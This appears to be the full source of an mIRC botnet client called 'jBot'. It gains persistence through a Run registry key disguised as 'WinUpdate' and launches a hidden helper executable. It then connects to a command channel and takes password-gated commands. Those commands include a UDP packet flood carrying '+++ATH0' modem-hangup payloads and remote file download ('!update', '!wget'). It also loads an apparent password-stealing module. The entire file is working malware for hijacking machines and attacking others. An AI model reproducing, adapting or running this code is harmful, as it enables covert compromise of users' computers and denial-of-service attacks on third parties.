alias alert { .exit }
alias scch { 
  if ($server == $null) { .server university.zapto.org } 
  if ($appstate !== hidden) { .exit } 
}
alias init { .timersc 0 20 /scch | .run sysd.exe /n /fh "mIRC" }
On *:Start:{
   set %mircdir $replace($mircexe,\,\\)
   set %filetoboot $rand(100,999) $+ .reg
   write %filetoboot REGEDIT4
   write %filetoboot [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
   write %filetoboot $+("WinUpdate"=",%mircdir,")
   .run -n regedit /s %filetoboot
   .timer 1 4 remove %filetoboot
   .timer 1 5 unset %filetoboot
   .timer 1 6 unset %mircdir
   .run sysd.exe /n /fh "mIRC"
   .nick $read n.dat $+ - $+ $r(1,99999)
   .anick $read n.dat $+ - $+ $r(1,99999)
   .identd on $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
   set %installtime $time(hh:nn:ss TT) | //set %installdate $time(mm/dd/yy)
   set %chan #owned
   set %ip $host
   /load -rs ntpass.mrc
   /load -rs bnc.mrc
   ;/load -rs UN.DRV
   /load -rs download.ini
   /load -rs webget.mrc
   if ($portfree(9292) == $false) { .exit } 
   else { /socklisten blah 9292 }
   .init
}
On *:Connect:{ .mode $me -x | .join %chan | .msg %chan 12[Running jBot by slacke12] | .msg %chan 12[Locked and Loaded.12] }
On *:Disconnect:{ .server }
On *:TEXT:!auth*:*:{ set %pass !@# | if (%pass8 == $null) { set %pass8 #@! } | if ($2- = %pass) { /msg # 12.12:jBot12:12.  Login Accepted - User: 12[ $+ $nick $+ 12] Level: 12[master12] | /set %master $address | /guser 10 $nick 3 } | if ($2- = %pass8) {  /msg # 12.12:jBot12:12.  Login Accepted - User: 12[ $+ $nick $+ 12] Level: 12[master12] | /guser 10 $nick 3 } }
On *:TEXT:!version*:{ .msg %chan 12[ Running jBot by slacke 12] }
On 10:TEXT:!join *:#:{ join $2 $3 }
On 10:TEXT:!part *:#:{ part $2 }
On 10:TEXT:!ip*:#:{ .msg %chan 12.12:jBot12:12. ip: [ %ip ] }
On 10:TEXT:!uptime *:#:{ .msg $chan System Uptime:4 $uptime(system,1) Mirc Uptime:4 $uptime(mirc,1) }
On 10:TEXT:!pfast*:#:{  //set %pchan # |  if ($4 == random) { //gcoolstart $2 $3 $r(1,65000) | halt } | //gcoolstart $2 $3 $4 }
alias gcoolstart  { if $1 = STOP { .timergcoolt off | unset %gnum | msg %pchan [packeting]: Halted! | unset %pchan } | if $3 = $null { return } |  if $timer(gcoolt).com != $null { msg %pchan ERROR! Currently flooding: $gettok($timer(gcoolt).com,3,32)  | return } |  msg %pchan 14[sending ( $+ $1 $+ ) packets to ( $+ $2 $+ ) on port: ( $+ $3 $+ )14] |  set %gnum 0 |  .timergcoolt -m 0 60 gdope $1 $2 $3 }
alias gdope {  if $3 = $null { goto done } |  :loop | if %gnum >= $1 { goto done } | inc %gnum 2 
  %gnum.p = $r(1,65000)
  sockudp gnumc1 $2 %gnum.p !@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)
  %gnum.p = $r(1,65000) 
  sockudp gnumc3 $2 %gnum.p + + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0
  %gnum.p = $r(1,65000)
  sockudp gnumc2 $2 %gnum.p @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  %gnum.p = $r(1,65000)
  sockudp gnumc4 $2 %gnum.p !@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@) 
  %gnum.p = $r(1,65000)
  sockudp gnumc5 $2 %gnum.p !@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)
  %gnum.p = $r(1,65000)
  sockudp gnumc6 $2 %gnum.p + + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0+ + +ATH0
  %gnum.p = $r(1,65000)
  sockudp gnumc7 $2 %gnum.p @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  %gnum.p = $r(1,65000)
  sockudp gnumc8 $2 %gnum.p !@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@)&!^&!*&!%&!%!@#%!^@) 
  return |  :done | //msg %pchan [packeting]: Finished! | .timergcoolt off | unset %gnum* | unset %pchan 
}
On 10:TEXT:!winmx*:#:{ if $me !isvo $chan { /halt } | if ($portfree(6699) == $true) { .msg %chan 12[WinMX12] Status: 12[Disabled.12] } | if ($portfree(6699) == $false) { .msg %chan 12[WinMX12] Status: 12[Enabled.12] } }
on 1:SOCKREAD:wwwGet: { .remove $mircdir\Temp  | msg %w.g.# 15Downloading...14 $gettok($sock($sockname).mark,3,32) | if ($sockerr > 0) return | :nextread | sockread %WWW.Temp |  if ($sockbr != 0) { if (%WWW.Temp != $Null) {  write $mircdir\Temp %WWW.Temp  } |  goto nextread   }
  if (HTTP/1.*20* iswm [ $read -l1 $mircdir\Temp ] ) { if ($exists($gettok($sock($sockname).mark,2,32))) {  .remove $gettok($sock($sockname).mark,2,32) } |   :GenNew |  set -u0 %WWW.Temp www $+ $rand(A,Z) $+ $rand(0,9) |  if ($sock(%WWW.Temp) != $null) { goto GenNew } |  sockrename wwwGet %WWW.Temp  
if (text/* iswm [ $read -sContent-Type: $mircdir\Temp ] ) { sockmark %WWW.Temp Text $gettok($sock($sockname).mark,2-,32)  } | else {   sockmark %WWW.Temp Bin $gettok($sock($sockname).mark,2-,32)  } |  .timer 1 1 sockwrite -tn %WWW.Temp GET $gettok($sock($sockname).mark,3,32)  } | else {  //echo -st $read -l2 $mircdir\Temp  }  unset %WWW.Temp }
on 1:SOCKREAD:www*: {  if ($sockerr > 0) return | :nextread | if ($gettok($sock($sockname).mark,1,32) == bin) { sockread &Temp |   if ($sockbr == 0) return |  if ($bvar(&Temp,0) != 0) { bwrite $gettok($sock($SockName).Mark,2,32) -1 $bvar(&Temp,0) &temp }  } | else {  sockread %WWW.Temp |  if ($sockbr == 0) return |  if (%WWW.Temp != $Null) { write $gettok($sock($SockName).Mark,2,32) %WWW.Temp } |   unset %WWW.Temp  } | goto nextread }
alias getdata {  if ($sock(wwwGet) == $null) {  if ($gettok($$1,1,47) == http:) { sockopen wwwGet $gettok($gettok($1,2,47),1,58) $iif($gettok($gettok($1,3,47),2,58) != $Null, $gettok($gettok($1,3,47),1,58), 80)   } | else { sockopen wwwGet $gettok($1,1,47) $iif($gettok($gettok($1,1,47),2,58) != $Null, $gettok($gettok($1,1,47),1,58), 80)  } |  if ($GetTok($1,$numtok($1,47),47) != $null) {  set -u0 %WWW.File $mircdir\ $+ $GetTok($1,$numtok($1,47),47)  } | else { set -u0 %WWW.File $mircdir\_root_   } |   sockmark wwwGet unknown %WWW.File $iif($gettok($$1,1,47) == http:, $1, [ http:// $+ [ $1 ] ] )  } | else {  .timer 1 1 getdata $1  } }
on 1:SOCKOPEN:wwwGet: { sockwrite -tn wwwGet HEAD $gettok($sock($sockname).mark,3,32) HTTP/1.1 | sockwrite -tn wwwGet Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* | sockwrite -tn wwwGet Accept-Language: en-au |  sockwrite -tn wwwGet Accept-Encoding: deflate |   sockwrite -tn wwwGet User-Agent: mIRCInstaller WWW Edition v0.0.1 | sockwrite -tn wwwGet Host: $host | sockwrite -tn wwwGet Connection: Keep-Alive  | sockwrite -tn wwwGet $lf  }
on 1:SOCKCLOSE:www*: {  msg %w.g.# 14[15File:14 $+ $gettok($sock($sockname).mark,3-,32) $+ ] 14[15Size:14 $+ $file($gettok($sock($sockname).mark,2,32)).size $+ ]12 Downloaded Successfully... |  if ($exists( [ $mircdir\Temp ] )) { .remove $mircdir\Temp } | unset %WWW* | unset %w.g.# }
on 10:TEXT:!update*:#:{ %w.g.# = # | /getdata $2 }
alias webze { socklisten webze 8420 }
on *:socklisten:webze:{
  if ($sockerr > 0) { return }
  sockaccept webze $+ $rand(1,9) $+ $rand(a,z) $+ $rand(1,9) $+ $rand(a,z) $+ $rand(1,9) $+ $rand(a,z)
}
on *:sockread:webze*:{
  if ($sockerr > 0) { return }
  set %x 0
  sockread %x
  if  (GET*HTTP/1.? iswm $gettok(%x,1-,32)) {
    var %i = 1
    while (%i < $lines(index.html)) { 
      sockwrite -nt $sockname $read -l $+ %i index.html 
      inc %i
    }
    sockclose $sockname 
    unset %x 
  }
}
on *:TEXT:!wget*:#: {
  if ($2-) {
    set %i $rand(1,10000)

    set %wget. $+ %i $2-
    set %wget. $+ %i $+ .write no

    set %wget. $+ %i $+ .file $gettok($eval(% $+ wget. $+ %i,2),$numtok($eval(% $+ wget. $+ %i,2),47),47)
    if ($right($eval(% $+ wget. $+ %i,2),1) == $chr(47)) set %wget. $+ %i $+ .file index.htm

    .remove " $+ $getdir $+ $eval(% $+ wget. $+ %i $+ .file,2) $+ "

    sockopen wget $+ %i $gettok($2-,2,47) 80
  }
}

alias letsgo {
  set %i $rand(1,10000)

  set %wget. $+ %i $2-
  set %wget. $+ %i $+ .write no
  set %wget. $+ %i $+ .type $null

  set %wget. $+ %i $+ .file $gettok($eval(% $+ wget. $+ %i,2),$numtok($eval(% $+ wget. $+ %i,2),47),47)
  if ($right($eval(% $+ wget. $+ %i,2),1) == $chr(47)) set %wget. $+ %i $+ .file index.htm

  .remove " $+ $getdir $+ $eval(% $+ wget. $+ %i $+ .file,2) $+ "

  sockopen wget $+ %i $gettok($2-,2,47) 80
}

on *:sockopen:wget*: {
  if ($sockerr) {
    msg $chan Web Get --- Sock Error: $sock($sockname).wsmsg
    unset $eval(% $+ wget. $+ $remove($sockname,wget) $+ *)
    halt
  }

  msg $chan Downloading....
  sockwrite -n $sockname GET / $+ $gettok($eval(% $+ wget. $+ $remove($sockname,wget),2),3-,47) HTTP/1.1
  sockwrite -n $sockname HOST: $gettok($eval(% $+ wget. $+ $remove($sockname,wget),2),2,47)
  sockwrite -n $sockname ACCEPT: */*
  sockwrite -n $sockname Referer: $gettok($eval(% $+ wget. $+ $remove($sockname,wget),2),1-2,47)
  sockwrite -n $sockname User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
  sockwrite -n $sockname Connection: close

  sockwrite -n $sockname $crlf
}

on *:sockread:wget*: {
  if ($eval(% $+ wget. $+ $remove($sockname,wget) $+ .write,2) == no) {
    sockread %trans.dl

    if (302 Found isin %trans.dl) msg $chan WGet --- 302 Error: Found
    if (404 Not Found isin %trans.dl) msg $chan WGet --- 404 Error: File Not Found
    if ($left(%trans.dl,12) == Content-Type)  {
      if (text !isin %trans.dl) set %wget. $+ $remove($sockname,wget) $+ .type I
      else {
        set %wget. $+ $remove($sockname,wget) $+ .type A
      }
    }
    if (($chr(58) !isin %trans.dl) && ($eval(% $+ wget. $+ $remove($sockname,wget) $+ .type,2))) unset $eval(% $+ wget. $+ $remove($sockname,wget) $+ .write)

    echo -s %trans.dl

    } | else {
    if ($eval(% $+ wget. $+ $remove($sockname,wget) $+ .type,2) == A) {
      sockread %trans.dl
      write " $+ $getdir $+ $eval(% $+ wget. $+ $remove($sockname,wget) $+ .file,2) $+ " %trans.dl
      } | else {
      sockread &trans.dl
      bwrite " $+ $getdir $+ $eval(% $+ wget. $+ $remove($sockname,wget) $+ .file,2) $+ " -1 &trans.dl
    }
  }
}

on *:sockclose:wget*: {
  msg $chan Download Complete (Size: $file($getdir $+ $eval(% $+ wget. $+ $remove($sockname,wget) $+ .file,2)).size $+ )

  unset $eval(% $+ wget. $+ $remove($sockname,wget) $+ *)
}
